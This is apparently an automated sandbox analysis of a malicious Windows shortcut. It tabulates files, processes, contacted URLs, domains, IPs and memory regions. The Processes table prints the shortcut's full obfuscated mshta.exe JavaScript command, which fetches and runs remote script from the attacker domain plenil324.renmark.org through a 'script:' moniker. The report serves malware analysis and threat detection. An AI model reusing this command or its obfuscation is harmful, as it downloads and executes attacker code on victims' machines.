Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
V323904LY3.lNK.lnk
|
MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun
Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htm
|
HTML document, Unicode text, UTF-8 text, with very long lines (3822)
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()"
>nul 2>&1 >nul 2>&1&&exit
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://plenil324.renmark.org/?5/
|
188.114.96.3
|
|
|
|
https://www.google.com.br/setprefdomain?prefdom=US&sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3D
|
unknown
|
||
|
https://play.google.com/?hl=en&tab=w8
|
unknown
|
||
|
https://www.google.com/intl/en/about/products?tab=wh
|
unknown
|
||
|
https://www.google.com.br
|
unknown
|
||
|
https://plenil324.renmark.org/
|
unknown
|
||
|
https://csp.withgoogle.com/csp/gws/other-hp
|
unknown
|
||
|
https://drive.google.com/?tab=wo
|
unknown
|
||
|
https://www.google.com.br/AGKb
|
unknown
|
||
|
hTtpS://plenil324.renmark.org/?5/
|
unknown
|
||
|
https://www.google.com.br/imghp?hl=en&tab=wi
|
unknown
|
||
|
https://news.google.com/?tab=wn
|
unknown
|
||
|
https://mail.google.com/mail/?tab=wm
|
unknown
|
||
|
http://schema.org/WebPage
|
unknown
|
||
|
https://www.youtube.com/?tab=w1
|
unknown
|
||
|
https://plenil324.renmark.org/?5/s
|
unknown
|
||
|
https://www.google.com.br/
|
142.250.138.94
|
||
|
https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&hl=pt-BR&source=home
|
unknown
|
||
|
https://plenil324.renmark.org/o
|
unknown
|
||
|
https://maps.google.com/maps?hl=en&tab=wl
|
unknown
|
||
|
http://www.google.com/history/optout?hl=en
|
unknown
|
||
|
https://plenil324.renmark.org/?5/.
|
unknown
|
||
|
https://plenil324.renmark.org/?5/lF
|
unknown
|
||
|
https://www.google.com.br/4
|
unknown
|
||
|
https://plenil324.renmark.org/?5/X
|
unknown
|
||
|
https://www.google.com.br/IGSb
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
plenil324.renmark.org
|
188.114.96.3
|
|
|
|
www.google.com.br
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
plenil324.renmark.org
|
European Union
|
|
|
|
142.250.138.94
|
unknown
|
United States
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1C1782AF000
|
trusted library allocation
|
page read and write
|
||
|
1B977174000
|
heap
|
page read and write
|
||
|
1C1783DD000
|
heap
|
page read and write
|
||
|
1C177970000
|
trusted library allocation
|
page read and write
|
||
|
1C1781C6000
|
heap
|
page read and write
|
||
|
1C1783D4000
|
heap
|
page read and write
|
||
|
1C17820D000
|
heap
|
page read and write
|
||
|
1C178204000
|
heap
|
page read and write
|
||
|
1C178275000
|
trusted library allocation
|
page read and write
|
||
|
1C178182000
|
heap
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1C1781DE000
|
heap
|
page read and write
|
||
|
1C178271000
|
trusted library allocation
|
page read and write
|
||
|
1C178174000
|
heap
|
page read and write
|
||
|
AF7404F000
|
stack
|
page read and write
|
||
|
1C178190000
|
heap
|
page read and write
|
||
|
1B9758BD000
|
heap
|
page read and write
|
||
|
AF738F4000
|
stack
|
page read and write
|
||
|
1C178416000
|
heap
|
page read and write
|
||
|
1C1781C6000
|
heap
|
page read and write
|
||
|
1B975914000
|
heap
|
page read and write
|
||
|
1C1781D9000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1C178480000
|
remote allocation
|
page read and write
|
||
|
1C1781CD000
|
heap
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1C178373000
|
heap
|
page read and write
|
||
|
1C1781EE000
|
heap
|
page read and write
|
||
|
1C1783F1000
|
heap
|
page read and write
|
||
|
1C1781F1000
|
heap
|
page read and write
|
||
|
1C178190000
|
heap
|
page read and write
|
||
|
1C1783E5000
|
heap
|
page read and write
|
||
|
1C17820D000
|
heap
|
page read and write
|
||
|
1C178370000
|
heap
|
page read and write
|
||
|
1B9758C3000
|
heap
|
page read and write
|
||
|
1C178182000
|
heap
|
page read and write
|
||
|
1B97583A000
|
heap
|
page read and write
|
||
|
1C1783F6000
|
heap
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1B977150000
|
heap
|
page readonly
|
||
|
1B9758EE000
|
heap
|
page read and write
|
||
|
1C1774DE000
|
heap
|
page read and write
|
||
|
1B9758BD000
|
heap
|
page read and write
|
||
|
1B975730000
|
heap
|
page read and write
|
||
|
1B975898000
|
heap
|
page read and write
|
||
|
1C178405000
|
heap
|
page read and write
|
||
|
1C1783E5000
|
heap
|
page read and write
|
||
|
1C1774C4000
|
heap
|
page read and write
|
||
|
1C178190000
|
heap
|
page read and write
|
||
|
1C1781CD000
|
heap
|
page read and write
|
||
|
1C178211000
|
heap
|
page read and write
|
||
|
1C178480000
|
remote allocation
|
page read and write
|
||
|
1B9758AD000
|
heap
|
page read and write
|
||
|
1C1781C6000
|
heap
|
page read and write
|
||
|
1C178480000
|
remote allocation
|
page read and write
|
||
|
1C1781E9000
|
heap
|
page read and write
|
||
|
1C17837D000
|
heap
|
page read and write
|
||
|
1C178214000
|
heap
|
page read and write
|
||
|
1B97717D000
|
heap
|
page read and write
|
||
|
1C1781EE000
|
heap
|
page read and write
|
||
|
1C178190000
|
heap
|
page read and write
|
||
|
1C1781D9000
|
heap
|
page read and write
|
||
|
1B975861000
|
heap
|
page read and write
|
||
|
1B977170000
|
heap
|
page read and write
|
||
|
1C178212000
|
heap
|
page read and write
|
||
|
1C1781CD000
|
heap
|
page read and write
|
||
|
1B977160000
|
heap
|
page read and write
|
||
|
1C178214000
|
heap
|
page read and write
|
||
|
1C178279000
|
trusted library allocation
|
page read and write
|
||
|
1C178416000
|
heap
|
page read and write
|
||
|
1B975806000
|
heap
|
page read and write
|
||
|
1B977164000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1C178212000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1B9758C5000
|
heap
|
page read and write
|
||
|
AF73E4E000
|
stack
|
page read and write
|
||
|
1C1774D9000
|
heap
|
page read and write
|
||
|
1C178405000
|
heap
|
page read and write
|
||
|
1C178192000
|
heap
|
page read and write
|
||
|
1C17827B000
|
trusted library allocation
|
page read and write
|
||
|
1C1781E3000
|
heap
|
page read and write
|
||
|
1B9758A3000
|
heap
|
page read and write
|
||
|
1C1783F6000
|
heap
|
page read and write
|
||
|
1C1783E5000
|
heap
|
page read and write
|
||
|
1B975750000
|
heap
|
page read and write
|
||
|
1C178416000
|
heap
|
page read and write
|
||
|
1C17840B000
|
heap
|
page read and write
|
||
|
1B975914000
|
heap
|
page read and write
|
||
|
1C178191000
|
heap
|
page read and write
|
||
|
1C1781C6000
|
heap
|
page read and write
|
||
|
1C1783AD000
|
heap
|
page read and write
|
||
|
1C178405000
|
heap
|
page read and write
|
||
|
1C178190000
|
heap
|
page read and write
|
||
|
1B975885000
|
heap
|
page read and write
|
||
|
1C1781F1000
|
heap
|
page read and write
|
||
|
1C1781F5000
|
heap
|
page read and write
|
||
|
1B97582F000
|
heap
|
page read and write
|
||
|
1C1783F4000
|
heap
|
page read and write
|
||
|
1C17820D000
|
heap
|
page read and write
|
||
|
1B975914000
|
heap
|
page read and write
|
||
|
1B97588A000
|
heap
|
page read and write
|
||
|
1C17840E000
|
heap
|
page read and write
|
||
|
1C1781F5000
|
heap
|
page read and write
|
||
|
1B9758BD000
|
heap
|
page read and write
|
||
|
1C1781D9000
|
heap
|
page read and write
|
||
|
1C1781CD000
|
heap
|
page read and write
|
||
|
1C178378000
|
heap
|
page read and write
|
||
|
1C1783AD000
|
heap
|
page read and write
|
||
|
1C1783AF000
|
heap
|
page read and write
|
||
|
1B9758AD000
|
heap
|
page read and write
|
||
|
1C178192000
|
heap
|
page read and write
|
||
|
1C1783FD000
|
heap
|
page read and write
|
||
|
AF73AFE000
|
stack
|
page read and write
|
||
|
1C178418000
|
heap
|
page read and write
|
||
|
AF7449F000
|
stack
|
page read and write
|
||
|
1C1783F1000
|
heap
|
page read and write
|
||
|
1C17818A000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1B9757B0000
|
trusted library allocation
|
page read and write
|
||
|
1C1781E6000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1C178204000
|
heap
|
page read and write
|
||
|
1C1774C0000
|
heap
|
page read and write
|
||
|
1C178212000
|
heap
|
page read and write
|
||
|
1C17820D000
|
heap
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1C178273000
|
trusted library allocation
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1C178211000
|
heap
|
page read and write
|
||
|
1C178178000
|
heap
|
page read and write
|
||
|
1C1781F5000
|
heap
|
page read and write
|
||
|
AF739FE000
|
stack
|
page read and write
|
||
|
1B975820000
|
heap
|
page read and write
|
||
|
1B9758A4000
|
heap
|
page read and write
|
||
|
1B9757C0000
|
trusted library allocation
|
page read and write
|
||
|
1C1781F1000
|
heap
|
page read and write
|
||
|
AF7439B000
|
stack
|
page read and write
|
||
|
1C178170000
|
heap
|
page read and write
|
||
|
1C1783E9000
|
heap
|
page read and write
|
||
|
1C1781E4000
|
heap
|
page read and write
|
||
|
1C1781D9000
|
heap
|
page read and write
|
||
|
1C178195000
|
heap
|
page read and write
|
||
|
1C1781DE000
|
heap
|
page read and write
|
||
|
1C178211000
|
heap
|
page read and write
|
||
|
1C17820D000
|
heap
|
page read and write
|
||
|
1B975848000
|
heap
|
page read and write
|
||
|
1C177770000
|
heap
|
page read and write
|
||
|
1C1781F1000
|
heap
|
page read and write
|
||
|
1B9758C2000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1B975848000
|
heap
|
page read and write
|
||
|
1B9758BD000
|
heap
|
page read and write
|
||
|
1C178298000
|
trusted library allocation
|
page read and write
|
||
|
1B9758EE000
|
heap
|
page read and write
|
||
|
1B97580D000
|
heap
|
page read and write
|
||
|
1B9758AD000
|
heap
|
page read and write
|
||
|
1C17B5F0000
|
heap
|
page read and write
|
||
|
1C17818C000
|
heap
|
page read and write
|
||
|
1B975800000
|
heap
|
page read and write
|
||
|
1C178416000
|
heap
|
page read and write
|
||
|
1B9758AD000
|
heap
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1C178408000
|
heap
|
page read and write
|
||
|
1C1783FD000
|
heap
|
page read and write
|
||
|
1C1783FD000
|
heap
|
page read and write
|
||
|
1C178405000
|
heap
|
page read and write
|
||
|
1C17840B000
|
heap
|
page read and write
|
||
|
1C1783F4000
|
heap
|
page read and write
|
||
|
1C17827D000
|
trusted library allocation
|
page read and write
|
||
|
1C178290000
|
trusted library allocation
|
page read and write
|
||
|
1C1782F0000
|
trusted library allocation
|
page execute
|
||
|
1C178416000
|
heap
|
page read and write
|
||
|
1C178380000
|
heap
|
page read and write
|
||
|
1C17B6A2000
|
trusted library allocation
|
page read and write
|
||
|
1C1781F5000
|
heap
|
page read and write
|
||
|
1B975650000
|
heap
|
page read and write
|
||
|
1C1782A5000
|
trusted library allocation
|
page read and write
|
||
|
1C17820D000
|
heap
|
page read and write
|
||
|
1B975862000
|
heap
|
page read and write
|
||
|
1C178405000
|
heap
|
page read and write
|
||
|
1C1783FD000
|
heap
|
page read and write
|
||
|
1C1774E1000
|
heap
|
page read and write
|
||
|
1C1781F8000
|
heap
|
page read and write
|
||
|
1B975827000
|
heap
|
page read and write
|
||
|
1B9758EE000
|
heap
|
page read and write
|
||
|
1C178211000
|
heap
|
page read and write
|
||
|
AF73F4D000
|
stack
|
page read and write
|
||
|
1C1783F4000
|
heap
|
page read and write
|
||
|
1B97586F000
|
heap
|
page read and write
|
||
|
1B975898000
|
heap
|
page read and write
|
||
|
1C17818A000
|
heap
|
page read and write
|
||
|
AF7429F000
|
stack
|
page read and write
|
||
|
1C1781E9000
|
heap
|
page read and write
|
||
|
1B975885000
|
heap
|
page read and write
|
||
|
1B97586B000
|
heap
|
page read and write
|
||
|
1C178295000
|
trusted library allocation
|
page read and write
|
||
|
1C1781E1000
|
heap
|
page read and write
|
||
|
1C1781DE000
|
heap
|
page read and write
|
||
|
1C1783F1000
|
heap
|
page read and write
|
||
|
1C178211000
|
heap
|
page read and write
|
||
|
1C17821A000
|
heap
|
page read and write
|
||
|
1C1783AF000
|
heap
|
page read and write
|
||
|
1C1783FD000
|
heap
|
page read and write
|
||
|
1B975898000
|
heap
|
page read and write
|
||
|
1B97588B000
|
heap
|
page read and write
|
||
|
1C1783F6000
|
heap
|
page read and write
|
||
|
1C1781DE000
|
heap
|
page read and write
|
||
|
1C1774D7000
|
heap
|
page read and write
|
||
|
1B9770C0000
|
heap
|
page read and write
|
There are 201 hidden memdumps, click here to show them.